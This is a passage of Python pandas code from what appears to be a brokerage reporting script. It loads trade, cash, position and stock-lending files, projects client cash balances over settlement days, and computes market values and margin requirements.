CONST_DIC[\"msse_trans_path\"].replace(\"????????\", CONST_DIC[\"cur_dt\"].strftime(\"%Y%m%d\"))\n\tprint (msse_trd_file)\n\tprint (msse_trans_file)\n\n\tmsse_trd_df = xlsx_to_df(msse_trd_file, dtype={\"INSTR_DSPLY_CDE\":\"str\"})\n\tmsse_trd_df = pd.merge(msse_trd_df, client_df[[\"AccountNo\", \"FAName\"]].rename(columns={\"AccountNo\": \"AC_ID\", \"FAName\": \"Client\"}), on=[\"AC_ID\"], how=\"inner\")\n\tmsse_trd_df[\"AMOUNT\"] = np.where(msse_trd_df[\"TXN_TYP_ACTN_CDE\"] == \"BUY\", -msse_trd_df[\"AMOUNT\"], msse_trd_df[\"AMOUNT\"])\n\n\tmsse_trans_df = xlsx_to_df(msse_trans_file)\n\tmsse_trans_df[\"TXN_TYP_NAM\"] = msse_trans_df[\"TXN_TYP_NAM\"].astype(\"str\")\n\tmsse_trans_df = msse_trans_df.loc[msse_trans_df.TXN_TYP_NAM == \"Clearing Fee\"]\n\tmsse_trans_df[\"INSTR_TYP_CDE\"] = \"BOND\"\n\tmsse_trans_df = pd.merge(msse_trans_df, client_df[[\"AccountNo\", \"FAName\"]].rename(columns={\"AccountNo\": \"AC_ID\", \"FAName\": \"Client\"}), on=[\"AC_ID\"], how=\"inner\")\n\tmsse_trans_df = msse_trans_df.rename(columns={\"TXNAMOUNT\":\"AMOUNT\", \"VALUEDATE\":\"SETL_DATE\",\"QUANTITY\":\"STK_QTY\",\"UNITPRICE\":\"PRICE\",\"STMTTRANSACTIONDATE\":\"INPT_DATE\"})[[\"AC_ID\", \"Client\", \"AMOUNT\", \"INSTR_DSPLY_CDE\", \"CCY_CDE\", \"INPT_DATE\", \"TRAD_DATE\", \"INSTR_TYP_CDE\", \"SETL_DATE\", \"STK_QTY\", \"PRICE\", \"REFERENCE\"]]\n\tmsse_trd_df = pd.concat([msse_trd_df, msse_trans_df], ignore_index=True)\n\t# mssd_trd_file = CONST_DIC[\"msse_trd_path\"].replace(\"????????\", CONST_DIC[\"cur_dt\"].strftime(\"%Y%m%d\"))\n\t# print (mssd_trd_file)\n\t# mssd_trd_df = xlsx_to_df(msse_trd_file)\n\n\tdata_files = glob.glob(CONST_DIC[\"consol_data_file\"])\n\tdata_files = list(filter(lambda x: x[-13:-5] < CONST_DIC[\"cur_dt\"].strftime(\"%Y%m%d\"), data_files))\n\tif len(data_files) > 0:\n\t\tconsol_xlsx = max(data_files)\n\t\tprint (consol_xlsx)\n\t\tprev_trd_df = xlsx_to_df(consol_xlsx, sheet=\"unsetl_trd\", na=\"\", dtype={\"INSTR_DSPLY_CDE\":\"str\"})\n\t\tprev_trd_df = prev_trd_df.loc[(prev_trd_df.INPT_DATE.astype('datetime64[ns]') < CONST_DIC[\"cur_dt\"]) & (prev_trd_df.SETL_DATE.astype('datetime64[ns]') >= CONST_DIC[\"cur_dt\"])]\n\t\tmsse_trd_df = pd.concat([prev_trd_df, msse_trd_df], ignore_index=True).drop([\"TRAD_PRICE_KEY\"], axis=1).drop_duplicates()\n\treturn msse_trd_df\n\ndef import_exposure():\n\texp_header, exp_arr = XmlHandler.xml_to_arr(CONST_DIC[\"exposure_file\"].replace(\"????????\", CONST_DIC[\"cur_dt\"].strftime(\"%Y%m%d\")), start_row=3)\n\tdf = pd.DataFrame(exp_arr, columns=exp_header)\n\tdf.columns = [re.sub(r\"[\\*\\.#/\\$%\\\"\\(\\)& :]\", \"\", c) for c in df.columns]\n\tdf = df.fillna(\"\")\n\treturn df\n\ndef import_cash():\n\tmsse_file = CONST_DIC[\"msse_bal_path\"].replace(\"????????\", CONST_DIC[\"cur_dt\"].strftime(\"%Y%m%d\"))\n\tprint (msse_file)\n\tmssd_file = CONST_DIC[\"mssd_bal_path\"].replace(\"????????\", CONST_DIC[\"cur_dt\"].strftime(\"%Y%m%d\"))\n\tprint (mssd_file)\n\tmssd_file = CONST_DIC[\"mssd_bal_path\"].replace(\"????????\", CONST_DIC[\"cur_dt\"].strftime(\"%Y%m%d\"))\n\tprint (mssd_file)\n\t\n\tmsse_df = xlsx_to_df(msse_file)\n\tmssd_df = xlsx_to_df(mssd_file)\n\n\tmsse_df = msse_df.rename(columns={\"SEGFUND_NAME\":\"SEG_FUND_NAME\"})\n\t# msse_df[\"EQUITY_HKD\"] = msse_df[\"CARRY_FORWARD_HKD\"]\n\tmsse_df = msse_df.drop([\"BROUGHT_FORWARD\", \"CARRY_FORWARD\"], axis=1)\n\n\tmssd_df = mssd_df.rename(columns={\"BROUGHT_FORWARD\":\"DAY_BEGIN_BAL\", \"CARRY_FORWARD\":\"LEDG_BAL\"})\n\tmssd_df[\"UPnL\"] = 
round(mssd_df[\"EQUITY_HKD\"]/mssd_df[\"EXCHANGE_RATE\"]-mssd_df[\"LEDG_BAL\"]-mssd_df[\"MARGIN\"], 2)\n\n\tmssd_df = mssd_df.drop([\"EQUITY_HKD\"], axis=1)\n\tcash_df = pd.concat([msse_df, mssd_df], ignore_index=True).fillna(0)\n\texch_df = cash_df[[\"CURRENCY\", \"EXCHANGE_RATE\"]].drop_duplicates()\n\n\treturn cash_df, exch_df\n\ndef import_positions(exch_df):\n\tmsse_file = CONST_DIC[\"msse_pos_path\"].replace(\"????????\", CONST_DIC[\"cur_dt\"].strftime(\"%Y%m%d\"))\n\tprint (msse_file)\n\tmsseo_file = CONST_DIC[\"msseo_pos_path\"].replace(\"????????\", CONST_DIC[\"cur_dt\"].strftime(\"%Y%m%d\"))\n\tprint (msseo_file)\n\tmssd_file = CONST_DIC[\"mssd_pos_path\"].replace(\"????????\", CONST_DIC[\"cur_dt\"].strftime(\"%Y%m%d\"))\n\tprint (mssd_file)\n\t\n\tmsse_df = xlsx_to_df(msse_file)\n\tmsseo_df = xlsx_to_df(msseo_file)\n\tmssd_df = xlsx_to_df(mssd_file)\n\n\tmsseo_df[\"INSTRUMENT_TYPE\"] = \"OPTIONS\"\n\tmsseo_df = msseo_df.rename(columns={\"INSTRUMENT_CLASS\":\"INSTRUMENT_CODE\",\"INSTRUMENT\":\"INSTRUMENT_NAME\",\"OPEN_LONG_QTY\":\"LONG_QTY\",\"OPEN_SHT_QTY\":\"SHORT_QTY\",\"CLOS_PRICE\":\"CLOSING_PRICE\",\"SETL_CCY_CDE\":\"TRADE_CURRENCY\"})\n\n\tmsse_df = pd.merge(msse_df, exch_df.rename(columns={\"CURRENCY\":\"SETL_CCY_CDE\"}), on=[\"SETL_CCY_CDE\"], how=\"inner\")\n\tmsseo_df = pd.merge(msseo_df, exch_df.rename(columns={\"CURRENCY\":\"TRADE_CURRENCY\"}), on=[\"TRADE_CURRENCY\"], how=\"inner\")\n\tmssd_df = pd.merge(mssd_df, exch_df.rename(columns={\"CURRENCY\":\"TRADE_CURRENCY\"}), on=[\"TRADE_CURRENCY\"], how=\"inner\")\n\t\n\treturn msse_df, pd.concat([msseo_df[[\"ACCOUNT\",\"MARKET_CODE\",\"INSTRUMENT_CODE\",\"INSTRUMENT_NAME\",\"INSTRUMENT_TYPE\",\"LONG_QTY\",\"SHORT_QTY\",\"TRADE_CURRENCY\",\"CLOSING_PRICE\",\"EXCHANGE_RATE\"]], \n\t\tmssd_df[[\"ACCOUNT\",\"MARKET_CODE\",\"INSTRUMENT_CODE\",\"INSTRUMENT_NAME\",\"INSTRUMENT_TYPE\",\"LONG_QTY\",\"SHORT_QTY\",\"TRADE_CURRENCY\",\"CLOSING_PRICE\",\"EXCHANGE_RATE\",\"UNREALIZE_PL\"]]], ignore_index=True)\n\ndef import_sbl():\n\tinput_file = CONST_DIC[\"stk_sbl_path\"].replace(\"????\", CONST_DIC[\"cur_dt\"].strftime(\"%m%d\"))\n\tprint (input_file)\n\n\tstk_df = pd.read_csv(input_file, delimiter='\\t', skiprows=1)\n\tstk_df = stk_df[[\"CODE\", \"DOMICILE\"]].rename(columns={\"CODE\":\"STOCK\"})\n\n\tinput_file = CONST_DIC[\"os_sbl_path\"].replace(\"????\", CONST_DIC[\"cur_dt\"].strftime(\"%m%d\"))\n\tprint (input_file)\n\t\n\tos_df = pd.read_csv(input_file, delimiter='\\t', skiprows=1)\n\tos_df.columns = [re.sub(r\"[\\*\\.#/\\$%\\\"\\(\\)& : ]\", \"\", c) for c in os_df.columns]\n\tos_df[\"STOCK\"] = os_df[\"STOCK\"].astype('str')\n\tos_df = pd.merge(os_df, stk_df, on=[\"STOCK\"], how=\"left\")\n\tos_df = os_df.fillna(0)\n\t\n\tinput_file = CONST_DIC[\"pd_sbl_path\"].replace(\"????\", CONST_DIC[\"cur_dt\"].strftime(\"%m%d\"))\n\tprint (input_file)\n\t\n\tpd_df = pd.read_csv(input_file, delimiter='\\t', skiprows=1)\n\tpd_df.columns = [re.sub(r\"[\\*\\.#/\\$%\\\"\\(\\)& : ]\", \"\", c) for c in pd_df.columns]\n\tpd_df[\"STOCK\"] = pd_df[\"STOCK\"].astype('str')\n\tpd_df = pd.merge(pd_df, stk_df, on=[\"STOCK\"], how=\"left\")\n\tpd_df = pd_df.fillna(0)\n\n\tinput_file = max(glob.iglob(CONST_DIC[\"fx_sbl_path\"]))\n\tprint (input_file)\n\n\tfx_df = pd.read_csv(input_file, delimiter=';', skiprows=1)\n\tfx_df = fx_df.rename(columns={\"CODE\":\"CURRENCY\", \"EXRATE_7DP\":\"EXCHANGE_RATE\"})\n\tfx_df[\"EXCHANGE_RATE\"] = 1/fx_df[\"EXCHANGE_RATE\"]\n\treturn os_df, pd_df, fx_df\n\ndef os_sbl_calc(client_df, sbl_df):\n\tcoll_arr = 
[]\n\n\tfor os_index, os_row in sbl_df.loc[ (sbl_df.CPTY.isin(client_df.SBLCode)) & (sbl_df.STOCK != 0) & (sbl_df.STOCK != 'nan') ].iterrows():\n\t\tcoll_arr.append([ os_row[\"BGNREF\"], client_df.loc[client_df.SBLCode == os_row[\"CPTY\"]].iloc[0].FAName, os_row[\"DOMICILE\"], os_row[\"LNCUR\"], str(os_row[\"STOCK\"]), os_row[\"SNAME\"], \"EQUITY\", \n\t\t\t\t\t\tdatetime.datetime.strptime(str(int(os_row[\"TRADE\"])), \"%Y%m%d\").strftime(\"%Y-%m-%d\"), datetime.datetime.strptime(str(int(os_row[\"SSET_DT\"])), \"%Y%m%d\").strftime(\"%Y-%m-%d\"), \n\t\t\t\t\t\tos_row[\"PRICE\"], (os_row[\"QTY\"] if os_row[\"PTYPE\"] == \"B\" else -os_row[\"QTY\"] ), \n\t\t\t\t\t\t(os_row[\"LNVAL\"] if os_row[\"PTYPE\"] == \"B\" else -os_row[\"LNVAL\"]), \n\t\t\t\t\t\t(os_row[\"LNVAL\"] if os_row[\"PTYPE\"] == \"B\" else -os_row[\"LNVAL\"])*os_row[\"COLLMGN\"]/100,\n\t\t\t\t\t\tos_row[\"LNRATE\"]/100, os_row[\"MIN_FEE\"] ])\n\n\tos_trd_df = pd.DataFrame(coll_arr, columns=[\"BGNREF\", \"CPTY\", \"CCY\", \"LNCCY\", \"STOCK\", \"SNAME\", \"INSTYPE\", \"TRD_DT\", \"SSET_DT\", \"PRICE\", \"OS_QTY\", \"OS_LOANVALUE\", \"OS_COLLATERAL\", \"COLLRATE\", \"MIN_FEE\"])\n\treturn os_trd_df.groupby([\"BGNREF\", \"CPTY\", \"CCY\", \"LNCCY\", \"STOCK\", \"SNAME\", \"INSTYPE\", \"TRD_DT\", \"SSET_DT\", \"PRICE\", \"COLLRATE\"], as_index=False).agg({\"OS_QTY\":\"sum\", \"OS_LOANVALUE\":\"sum\", \"OS_COLLATERAL\":\"sum\", \"MIN_FEE\":\"sum\"})\n\ndef pd_sbl_calc(client_df, sbl_df):\n\tcoll_arr = []\n\n\tfor pd_index, pd_row in sbl_df.loc[ (sbl_df.CPTY.isin(client_df.SBLCode)) & (sbl_df.STOCK != 0) & (sbl_df.STOCK != 'nan') ].iterrows():\n\t\tcoll_arr.append([ pd_row[\"BGNREF\"], client_df.loc[client_df.SBLCode == pd_row[\"CPTY\"]].iloc[0].FAName, pd_row[\"DOMICILE\"], pd_row[\"LNCUR\"], str(pd_row[\"STOCK\"]), pd_row[\"SNAME\"], \"EQUITY\", \n\t\t\t\t\t\tdatetime.datetime.strptime(str(int(pd_row[\"TRADE\"])), \"%Y%m%d\").strftime(\"%Y-%m-%d\"),datetime.datetime.strptime(str(int(pd_row[\"SSET_DT\"])), \"%Y%m%d\").strftime(\"%Y-%m-%d\"), \n\t\t\t\t\t\tpd_row[\"LNVAL\"]/pd_row[\"QTY\"], (pd_row[\"QTY\"] if ((pd_row[\"BL\"] == \"L\" and pd_row[\"STATUS\"] == \"R\") or (pd_row[\"BL\"] == \"B\" and pd_row[\"STATUS\"] == \"L\")) else -pd_row[\"QTY\"] ), \n\t\t\t\t\t\t(pd_row[\"LNVAL\"] if ((pd_row[\"BL\"] == \"L\" and pd_row[\"STATUS\"] == \"R\") or (pd_row[\"BL\"] == \"B\" and pd_row[\"STATUS\"] == \"L\")) else -pd_row[\"LNVAL\"]), \n\t\t\t\t\t\t(pd_row[\"LNVAL\"] if ((pd_row[\"BL\"] == \"L\" and pd_row[\"STATUS\"] == \"R\") or (pd_row[\"BL\"] == \"B\" and pd_row[\"STATUS\"] == \"L\")) else -pd_row[\"LNVAL\"])*pd_row[\"COLLMGN\"]/100,\n\t\t\t\t\t\tpd_row[\"LNRATE\"]/100, pd_row[\"MIN_FEE\"] ])\n\n\tpd_trd_df = pd.DataFrame(coll_arr, columns=[\"BGNREF\", \"CPTY\", \"CCY\", \"LNCCY\", \"STOCK\", \"SNAME\", \"INSTYPE\", \"TRD_DT\", \"SSET_DT\", \"PRICE\", \"PD_QTY\", \"PD_LOANVALUE\", \"PD_COLLATERAL\", \"COLLRATE\", \"MIN_FEE\"])\n\treturn pd_trd_df.groupby([\"BGNREF\", \"CPTY\", \"CCY\", \"LNCCY\", \"STOCK\", \"SNAME\", \"INSTYPE\", \"TRD_DT\", \"SSET_DT\", \"PRICE\", \"COLLRATE\"], as_index=False).agg({\"PD_QTY\":\"sum\", \"PD_LOANVALUE\":\"sum\", \"PD_COLLATERAL\":\"sum\", \"MIN_FEE\":\"sum\"})\n\ndef cash_acc(client_df, cash_df, pd_coll_df, unsetl_trd_df):\n\tweekday_arr = list( rrule(DAILY, dtstart=CONST_DIC[\"cur_dt\"], count=CONST_DIC[\"setl_dt_range\"], byweekday=(MO,TU,WE,TH,FR)) )\n\tday_header = list(map(lambda x: x.strftime(\"%d-%b-%Y\"), weekday_arr))\n\t\n\tcash_client_df = pd.merge(cash_df[[\"ACCOUNT\", \"CURRENCY\", 
\"DAY_BEGIN_BAL\", \"EXCHANGE_RATE\", \"LEDG_BAL\", \"MARGIN\", \"CONF_USETL_BAL\", \"STATEMENT_DATE\", \"ACCRUED_INTEREST\", \"UPnL\", \"HOLD_FUND_BAL\"]], \n\t\t\tclient_df[[\"FAName\", \"AccountNo\", \"BaseCCY\", \"AccountType\"]].drop_duplicates().rename(columns={\"FAName\":\"Client\",\"AccountNo\":\"ACCOUNT\"}), on=[\"ACCOUNT\"], how=\"inner\")\n\t\n\tproj_df = pd.DataFrame(columns=[\"Client\", \"Currency\", \"FxRate\", \"SetlDt\", \"Opening\", \"Movement\", \"Projected\"])\n\tfor cln_idx, cln_row in cash_client_df.groupby([\"Client\", \"CURRENCY\",\"EXCHANGE_RATE\"], as_index=False).agg({\"DAY_BEGIN_BAL\":\"sum\", \"LEDG_BAL\":\"sum\"}).iterrows():\n\t\tfor idx, weekday in enumerate(weekday_arr):\n\t\t\tif idx == 0:\n\t\t\t\tcoll_sum = pd_coll_df.loc[(pd_coll_df.CPTY == cln_row[\"Client\"]) & (pd_coll_df.CCY == cln_row[\"CURRENCY\"]) & (pd_coll_df.SSET_DT.astype('datetime64') > weekday)][\"PD_COLLATERAL\"].sum() \n\t\t\t\ttrd_sum = unsetl_trd_df.loc[(unsetl_trd_df.Client == cln_row[\"Client\"]) & (unsetl_trd_df.CCY_CDE == cln_row[\"CURRENCY\"]) & (unsetl_trd_df.SETL_DATE.astype('datetime64[ns]') > weekday)][\"AMOUNT\"].sum() \n\t\t\t\tmovement = coll_sum + trd_sum + float(cln_row[\"LEDG_BAL\"])-float(cln_row[\"DAY_BEGIN_BAL\"])\n\t\t\t\tproj_df = proj_df.append({\"Client\": cln_row[\"Client\"], \"Currency\": cln_row[\"CURRENCY\"], \"FxRate\": cln_row[\"EXCHANGE_RATE\"], \"SetlDt\": -1, \"Opening\": float(cln_row[\"DAY_BEGIN_BAL\"]),\n\t\t\t\t\t\"Movement\": movement, \"Projected\": float(cln_row[\"DAY_BEGIN_BAL\"])+movement }, ignore_index=True)\n\n\t\t\t\tproj_df = proj_df.append({\"Client\": cln_row[\"Client\"], \"Currency\": cln_row[\"CURRENCY\"], \"FxRate\": cln_row[\"EXCHANGE_RATE\"], \"SetlDt\": str(idx), \"Opening\": float(cln_row[\"DAY_BEGIN_BAL\"]),\n\t\t\t\t\t\"Movement\": float(cln_row[\"LEDG_BAL\"])-float(cln_row[\"DAY_BEGIN_BAL\"]), \"Projected\": float(cln_row[\"LEDG_BAL\"]) }, ignore_index=True)\n\n\t\t\telse:\n\t\t\t\tlast_close = proj_df.loc[(proj_df.Client == cln_row[\"Client\"]) & (proj_df.Currency == cln_row[\"CURRENCY\"]) & (proj_df.SetlDt == str(idx-1))].iloc[0].Projected\n\n\t\t\t\tcoll_sum = pd_coll_df.loc[(pd_coll_df.CPTY == cln_row[\"Client\"]) & (pd_coll_df.CCY == cln_row[\"CURRENCY\"]) & (pd_coll_df.SSET_DT.astype('datetime64') == weekday)][\"PD_COLLATERAL\"].sum() \n\t\t\t\ttrd_sum = unsetl_trd_df.loc[(unsetl_trd_df.Client == cln_row[\"Client\"]) & (unsetl_trd_df.CCY_CDE == cln_row[\"CURRENCY\"]) & (unsetl_trd_df.SETL_DATE.astype('datetime64[ns]') == weekday)][\"AMOUNT\"].sum() \n\t\t\t\tmovement = coll_sum + trd_sum\n\n\t\t\t\tproj_df = proj_df.append({\"Client\": cln_row[\"Client\"], \"Currency\": cln_row[\"CURRENCY\"], \"FxRate\": cln_row[\"EXCHANGE_RATE\"], \"SetlDt\": str(idx), \"Opening\": last_close, \"Movement\": movement, \"Projected\": last_close+movement }, ignore_index=True) \n\n\t\n\treturn cash_client_df, proj_df\n\ndef eqt_ls_mv(client_df, pos_df, os_coll_df, pd_coll_df, exch_df):\n\tpos_arr = []\n\n\texch_dict = list(exch_df.to_dict(orient=\"list\").values())\n\texch_dict = {v:k for k,v in dict(zip(*exch_dict)).items()}\n\t\n\tpos_df = pd.merge(pos_df, client_df[[\"FAName\", \"AccountNo\", \"AccountType\"]].drop_duplicates().rename(columns={\"FAName\":\"Client\", \"AccountNo\":\"ACCOUNT\"}), on=[\"ACCOUNT\"], how=\"inner\")\n\tconsol_pos_df = pos_df.groupby([\"Client\", \"AccountType\", \"SETL_CCY_CDE\", \"MARKET_CODE\", \"INSTRUMENT_TYPE\", \"INSTRUMENT_CODE\", \"INSTRUMENT_NAME\", \"DISCOUNT_RATIO\", \"CLOSING_PRICE\"], 
as_index=False).agg({\"SETTLED_QTY\":\"sum\", \"PEND_SETL_QTY\":\"sum\", \"MARKET_VALUE\":\"sum\"})\n\n\tg1_inv_df = pd.merge(os_coll_df, pd_coll_df, on=[\"BGNREF\", \"CPTY\", \"CCY\", \"LNCCY\", \"STOCK\", \"SNAME\", \"INSTYPE\", \"TRD_DT\", \"SSET_DT\", \"PRICE\", \"COLLRATE\"], how=\"outer\")\n\tg1_inv_df = g1_inv_df.groupby([\"CPTY\", \"CCY\", \"STOCK\", \"SNAME\", \"INSTYPE\", \"PRICE\"], as_index=False).agg({\"OS_QTY\":\"sum\", \"OS_LOANVALUE\":\"sum\", \"PD_QTY\":\"sum\", \"PD_LOANVALUE\":\"sum\"})\n\tg1_inv_df = g1_inv_df.rename(columns={\"CPTY\":\"Client\", \"CCY\":\"SETL_CCY_CDE\", \"STOCK\":\"INSTRUMENT_CODE\", \"INSTYPE\":\"INSTRUMENT_TYPE\", \"PRICE\":\"CLOSING_PRICE\"})\n\tg1_inv_df.loc[g1_inv_df.SETL_CCY_CDE == \"HKD\", \"INSTRUMENT_CODE\"] = g1_inv_df[\"INSTRUMENT_CODE\"].apply(lambda x: (\"00000\" + str(x))[-5:] )\n\tg1_inv_df[\"MARKET_CODE\"] = g1_inv_df[\"SETL_CCY_CDE\"].map(G1_MKT_DICT)\n\n\tconsol_pos_df = pd.merge(consol_pos_df.loc[consol_pos_df[\"INSTRUMENT_TYPE\"] != \"STRUCTPRD\"], g1_inv_df, on=[\"Client\", \"SETL_CCY_CDE\", \"MARKET_CODE\", \"INSTRUMENT_CODE\", \"INSTRUMENT_TYPE\", \"CLOSING_PRICE\"], how=\"outer\")\n\tconsol_pos_df[\"INSTRUMENT_NAME\"] = consol_pos_df[\"INSTRUMENT_NAME\"].fillna(consol_pos_df[\"SNAME\"])\n\tconsol_pos_df[\"DISCOUNT_RATIO\"] = consol_pos_df[\"DISCOUNT_RATIO\"].fillna(0)\n\tconsol_pos_df[\"SETTLED_QTY\"] = consol_pos_df[\"SETTLED_QTY\"].fillna(0)\n\tconsol_pos_df[\"PEND_SETL_QTY\"] = consol_pos_df[\"PEND_SETL_QTY\"].fillna(0)\n\tconsol_pos_df[\"OS_QTY\"] = consol_pos_df[\"OS_QTY\"].fillna(0)\n\tconsol_pos_df[\"PD_QTY\"] = consol_pos_df[\"PD_QTY\"].fillna(0)\n\tconsol_pos_df[\"AccountType\"] = consol_pos_df[\"AccountType\"].fillna('S')\n\tconsol_pos_df[\"EXCHANGE_RATE\"] = consol_pos_df[\"SETL_CCY_CDE\"].map(exch_dict)\n\t\n\tfor pos_index, pos_row in consol_pos_df.iterrows():\n\t\tins_code = str(pos_row[\"INSTRUMENT_CODE\"])\n\t\t\n\t\tmkt_price = pos_row[\"CLOSING_PRICE\"]\n\t\t\n\t\tsd_qty = pos_row[\"SETTLED_QTY\"] + pos_row[\"OS_QTY\"]\n\t\ttd_qty = pos_row[\"SETTLED_QTY\"] + pos_row[\"PEND_SETL_QTY\"] + pos_row[\"OS_QTY\"] + pos_row[\"PD_QTY\"]\n\n\t\tif sd_qty > 0 and pos_row[\"AccountType\"] == \"S\":\n\t\t\tacc_type = \"X\"\n\t\telse:\n\t\t\tif pos_row[\"INSTRUMENT_TYPE\"] == \"EQUITY\":\n\t\t\t\tacc_type = pos_row[\"AccountType\"]\n\t\t\telse:\n\t\t\t\tacc_type = \"B\"\n\n\t\tpos_arr.append([ pos_row[\"Client\"], pos_row[\"SETL_CCY_CDE\"], ins_code, pos_row[\"MARKET_CODE\"], \n\t\t\tins_code.lstrip('0')+\" \"+MKT_DICT[pos_row[\"MARKET_CODE\"]]+\" Equity\" if pos_row[\"INSTRUMENT_TYPE\"] == \"EQUITY\" else pos_row[\"INSTRUMENT_CODE\"], pos_row[\"INSTRUMENT_NAME\"], pos_row[\"INSTRUMENT_TYPE\"], mkt_price,\n\t\t\tsd_qty, td_qty, sd_qty*mkt_price, td_qty*mkt_price, pos_row[\"DISCOUNT_RATIO\"], pos_row[\"EXCHANGE_RATE\"], acc_type ])\n\n\teqt_mv_df = pd.DataFrame(pos_arr, columns=[\"Client\", \"Currency\", \"InstrumentCode\", \"Market\", \"BBGCode\", \"InstrumentName\", \"InstrumentType\", \"MktPrice\", \"SdQty\", \"TdQty\", \"SdMarketValue\", \"TdMarketValue\", \"MarginRatio\", \"FxRate\", \"AccountType\" ])\n\t\n\teqt_mv_df[\"DiscountValue\"] = eqt_mv_df[\"TdMarketValue\"] * (1 - eqt_mv_df[\"MarginRatio\"])\n\treturn eqt_mv_df.sort_values(by=['Client', 'Currency', 'InstrumentType', 'InstrumentCode'], ascending=[True, True, True, True])\n\ndef eqt_shrt_coll(client_df, exposure_df):\n\texposure_df.loc[exposure_df.Transaction == \"L-Principal\", \"Transaction\"] = \"Loan\"\n\texposure_df = exposure_df.loc[exposure_df.Currency 
!= \"\"]\n\texposure_df[\"SBLCode\"] = exposure_df[\"Counterparty\"].apply(lambda x: x.split(' ')[0] )\n\texposure_df[\"MarketExposure\"] = exposure_df[\"MarketExposure\"].apply(lambda x: str(x).replace(',','')).astype(\"float64\")\n\texposure_df[\"MarginExposure\"] = exposure_df[\"MarginExposure\"].apply(lambda x: str(x).replace(',','')).astype(\"float64\")\n\tloan_df = pd.merge(exposure_df, client_df, on=[\"SBLCode\"], how=\"inner\").groupby([\"FAName\", \"Currency\", \"Transaction\", \"Margin\"], as_index=False).agg({\"MarketExposure\":\"sum\",\"MarginExposure\":\"sum\"})\n\treturn loan_df.rename(columns={\"FAName\":\"Client\"})\n\ndef fut_exp(client_df, pos_df):\n\tpos_arr = []\n\n\tfor pos_index, pos_row in pos_df.loc[ (pos_df[\"ACCOUNT\"].isin(client_df.loc[(client_df.AccountType == \"F\") ].AccountNo))].iterrows():\n\t\tif int(pos_row[\"LONG_QTY\"]) > 0:\n\t\t\tpos_arr.append([ client_df.loc[client_df.AccountNo == pos_row[\"ACCOUNT\"]].iloc[0].FAName, pos_row[\"TRADE_CURRENCY\"], \n\t\t\t\tpos_row[\"INSTRUMENT_CODE\"], pos_row[\"MARKET_CODE\"], pos_row[\"INSTRUMENT_CODE\"], pos_row[\"INSTRUMENT_NAME\"], pos_row[\"INSTRUMENT_TYPE\"], \n\t\t\t\t\"L\", pos_row[\"CLOSING_PRICE\"], int(pos_row[\"LONG_QTY\"]), int(pos_row[\"LONG_QTY\"]), 0, 0, 0, pos_row[\"EXCHANGE_RATE\"], pos_row[\"UNREALIZE_PL\"] ])\n\t\tif int(pos_row[\"SHORT_QTY\"]) > 0:\n\t\t\tpos_arr.append([ client_df.loc[client_df.AccountNo == pos_row[\"ACCOUNT\"]].iloc[0].FAName, pos_row[\"TRADE_CURRENCY\"], \n\t\t\t\tpos_row[\"INSTRUMENT_CODE\"], pos_row[\"MARKET_CODE\"], pos_row[\"INSTRUMENT_CODE\"], pos_row[\"INSTRUMENT_NAME\"], pos_row[\"INSTRUMENT_TYPE\"], \n\t\t\t\t\"S\", pos_row[\"CLOSING_PRICE\"], -int(pos_row[\"SHORT_QTY\"]), -int(pos_row[\"SHORT_QTY\"]), 0, 0, 0, pos_row[\"EXCHANGE_RATE\"], pos_row[\"UNREALIZE_PL\"] ])\n\n\treturn pd.DataFrame(pos_arr, columns=[\"Client\", \"Currency\", \"InstrumentCode\", \"Market\", \"BBGCode\", \"InstrumentName\", \"InstrumentType\", \"LS\", \"MktPrice\", \"SdQty\", \"TdQty\", \"SdMarketValue\", \"TdMarketValue\", \"MarginRatio\", \"FxRate\", \"UPnl\" ])\n\ndef margin_req(balance_df, eqt_shrt_coll_df, eqt_mv_df):\n\tlong_mv_df = eqt_mv_df.loc[(eqt_mv_df.AccountType == \"L\") | (eqt_mv_df.AccountType == \"B\")].groupby([\"Client\", \"Currency\",\"AccountType\"], as_index=False).agg({\"TdMarketValue\":\"sum\",\"SdMarketValue\":\"sum\",\"DiscountValue\":\"sum\"}).rename(columns={\"TdMarketValue\":\"TDMV\",\"SdMarketValue\":\"SDMV\",\"DiscountValue\":\"LongDiscountValue\"})\n\tshrt_mv_df = eqt_mv_df.loc[eqt_mv_df.AccountType == \"S\"].groupby([\"Client\", \"Currency\",\"AccountType\"], as_index=False).agg({\"TdMarketValue\":\"sum\",\"SdMarketValue\":\"sum\"}).rename(columns={\"TdMarketValue\":\"STDMV\",\"SdMarketValue\":\"SSDMV\"})\n\texcs_mv_df = eqt_mv_df.loc[eqt_mv_df.AccountType == \"X\"].groupby([\"Client\", \"Currency\",\"AccountType\"], as_index=False).agg({\"TdMarketValue\":\"sum\",\"SdMarketValue\":\"sum\",\"DiscountValue\":\"sum\"}).rename(columns={\"TdMarketValue\":\"ETDMV\",\"SdMarketValue\":\"ESDMV\",\"DiscountValue\":\"ExcsDiscountValue\"})\n\n\tmargin_df = balance_df.groupby([\"Client\", \"AccountType\", \"CURRENCY\", \"EXCHANGE_RATE\"], as_index=False).agg({\"LEDG_BAL\":\"sum\", \"CONF_USETL_BAL\":\"sum\", \"ACCRUED_INTEREST\":\"sum\", \"MARGIN\":\"sum\", \"UPnL\":\"sum\", \"HOLD_FUND_BAL\":\"sum\"})\n\tmargin_df = margin_df.rename(columns={\"CURRENCY\":\"Currency\", \"EXCHANGE_RATE\":\"FxRate\", \"CONF_USETL_BAL\":\"PendingCash\", \"MARGIN\":\"Margin\", 
\"LEDG_BAL\":\"SettledCash\", \"ACCRUED_INTEREST\":\"Accrued\"})\n\tmargin_df = pd.merge(margin_df, eqt_mv_df[[\"Client\", \"Currency\", \"AccountType\", \"FxRate\"]].drop_duplicates(), on=[\"Client\", \"Currency\",\"AccountType\", \"FxRate\"], how=\"outer\")\n\n\tmargin_df = margin_df.replace({0:None})\n\n\tshrt_coll_df = eqt_shrt_coll_df.groupby([\"Client\", \"Currency\", \"Transaction\"]).agg({\"MarginExposure\":\"sum\"}).transpose().stack([0,1]).reset_index()\n\tshrt_coll_df = shrt_coll_df.drop([\"level_0\"], axis=1)\n\tshrt_coll_df[\"AccountType\"] = \"S\"\n\tmargin_df = pd.merge(margin_df, shrt_coll_df, on=[\"Client\", \"Currency\", \"AccountType\"], how=\"left\")\n\t\n\tmargin_df[\"Margin\"] = margin_df[\"Margin\"].fillna(margin_df[\"Cash Pool L\"])\n\tmargin_df = margin_df.rename(columns={\"Loan\":\"Collateral\"})\n\tmargin_df = margin_df.drop([\"Cash Pool L\"], axis=1)\n\t\n\tmargin_df = pd.merge(margin_df, long_mv_df, on=[\"Client\", \"Currency\", \"AccountType\"], how=\"left\")\n\tmargin_df = pd.merge(margin_df, shrt_mv_df, 